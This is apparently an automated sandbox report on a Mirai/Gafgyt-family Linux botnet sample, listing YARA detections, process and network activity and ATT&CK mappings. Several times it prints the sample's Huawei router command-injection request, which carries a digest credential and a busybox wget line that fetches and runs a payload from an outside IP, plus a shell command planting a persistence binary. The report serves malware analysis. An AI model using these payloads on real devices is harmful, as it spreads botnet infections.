          Source: unknownTCP traffic detected without corresponding DNS query: 197.201.119.217
          Source: unknownTCP traffic detected without corresponding DNS query: 197.146.203.132
          Source: unknownTCP traffic detected without corresponding DNS query: 157.16.36.193
          Source: unknownTCP traffic detected without corresponding DNS query: 147.203.32.94
          Source: unknownTCP traffic detected without corresponding DNS query: 41.11.65.191
          Source: unknownTCP traffic detected without corresponding DNS query: 157.170.214.155
          Source: unknownTCP traffic detected without corresponding DNS query: 157.59.163.2
          Source: unknownTCP traffic detected without corresponding DNS query: 183.9.177.103
          Source: unknownTCP traffic detected without corresponding DNS query: 59.35.85.25
          Source: unknownTCP traffic detected without corresponding DNS query: 36.163.108.31
          Source: unknownTCP traffic detected without corresponding DNS query: 41.177.90.248
          Source: v8OWS3Ylfj.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: v8OWS3Ylfj.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 38 2e 35 35 2e 31 39 36 2e 31 38 36 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: Process Memory Space: v8OWS3Ylfj.elf PID: 6223, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: Process Memory Space: v8OWS3Ylfj.elf PID: 6223, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: Content-Length: /bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
          Source: classification engineClassification label: mal92.troj.linELF@0/0@1/0
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1582/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/3088/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/230/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/110/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/231/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/111/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/232/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1579/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/112/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/233/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1699/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/113/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/234/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1335/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1698/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/114/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/235/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1334/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1576/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/2302/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/115/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/236/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/116/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/237/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/117/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/118/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/910/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/6227/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/119/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/912/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/6228/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/10/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/2307/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/11/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/918/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/12/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/13/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/14/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/15/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/16/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/17/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/18/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1594/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/120/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/121/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1349/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/122/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/243/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/123/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/2/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/124/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/3/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/4/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/125/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/126/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1344/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1465/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1586/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/127/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/6/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/248/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/128/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/249/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1463/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/800/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/9/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/801/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/20/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/21/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1900/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/22/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/23/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/24/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/25/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/26/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/27/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/28/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/29/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/491/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/250/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/130/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/251/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/252/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/132/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/253/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/254/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/255/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/256/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1599/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/257/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1477/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/379/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/258/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1476/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/259/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1475/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/936/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/30/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/2208/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/35/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1809/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/1494/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/260/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6226)File opened: /proc/261/cmdline
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6224)Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv \"/tmp/v8OWS3Ylfj.elf \\xdc\u0420\\xff\\x84\\x88&bin/watchdog; chmod 777 bin/watchdog"
          Source: submitted sampleStderr: sh: 1: Syntax error: Unterminated quoted string: exit code = 0

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46180 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42668 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 42668
          Source: unknownNetwork traffic detected: HTTP traffic on port 34274 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34274 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32862 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215

          Stealing of Sensitive Information

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: v8OWS3Ylfj.elf, type: SAMPLE
          Source: Yara matchFile source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY
          Yara detected Moobot
          Source: Yara matchFile source: v8OWS3Ylfj.elf, type: SAMPLE
          Source: Yara matchFile source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: v8OWS3Ylfj.elf, type: SAMPLE
          Source: Yara matchFile source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY
          Yara detected Moobot
          Source: Yara matchFile source: v8OWS3Ylfj.elf, type: SAMPLE
          Source: Yara matchFile source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scripting          		Path InterceptionPath Interception1
          Scripting          		1
          OS Credential Dumping          		System Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
          Non-Standard Port          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
